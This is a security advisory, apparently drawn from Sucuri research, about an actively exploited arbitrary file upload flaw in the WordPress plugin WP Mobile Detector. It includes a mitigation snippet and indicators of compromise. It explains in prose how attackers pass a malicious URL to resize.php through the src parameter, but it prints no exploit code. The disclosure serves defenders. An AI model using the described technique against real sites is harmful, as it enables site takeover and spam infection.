WP Mobile Detector is a plugin that automatically detects standard and advanced mobile devices and displays a compatible WordPress mobile theme. The WP Mobile Detector WordPress plugin automatically detects if the visitor is using a standard mobile phone or a smart phone and loads a compatible WordPress mobile theme for each.
For the last few days, Sucuri noticed that an increasing number of websites were infected without any outdated plugin or known vulnerability. In most cases it was a porn spam infection. Then the research team started to dig into the issue and found that the common denominator across these WordPress sites was the plugin WP Mobile Detector that had a 0-day arbitrary file upload vulnerability disclosed on May 31st by the Plugin Vulnerabilities team. The plugin has since been removed from the WordPress repository and no patches are available.
The vulnerability is very easy to exploit, all the attacker needs to do is send a request to resize.php or timthumb.php (yes, timthumb, in this case it just includes resize.php), inside the plugin directory with the backdoor URL. This vulnerability was publicly disclosed May 31st, but according to our firewall logs, the attack has been going since May 27th.
It’s a simple vulnerability that stems from failing to validate and sanitize input from untrusted sources. No security checks are performed and an attacker can feed the src variable with a malicious URL that contains a PHP code.
It highly recommended that everyone should remove this plugin for now. If you really need this plugin, the partial temporary fix will be to disable PHP execution in the wp-mobile-detector/cache subdirectory, for example using this code in the .htaccess file.
<Files *.php> deny from all </Files>
Please note that this fix will only save you from executing malware on your server. Hackers will still be able to upload files to the cache subdirectory and use links to them in attacks to third-party sites (iframes, scripts, malicious downloads) or just to host spammy/illegal content. You can also revoke write permissions in the cache subdirectory altogether, but it may break the plugin functionality.
The guys at Sucuri have been testing this exploits against the most popular WordPress security plugins offering application level firewalls and other preventive measures, it has successfully evaded all existing preventive controls. Sites behind the Sucuri Firewall have been patched via the systems virtual hardening engine that sits at the edge since its release.
At this moment the majority of the vulnerable sites are infected with the porn spam doorways. You can usually find the gopni3g directory in the site root, that contains story.php (doorway generator script), .htaccess and subdirectories with spammy files and templates. The doorways redirect visitors to hxxp://bipaoeity[.]in/for/77?d=.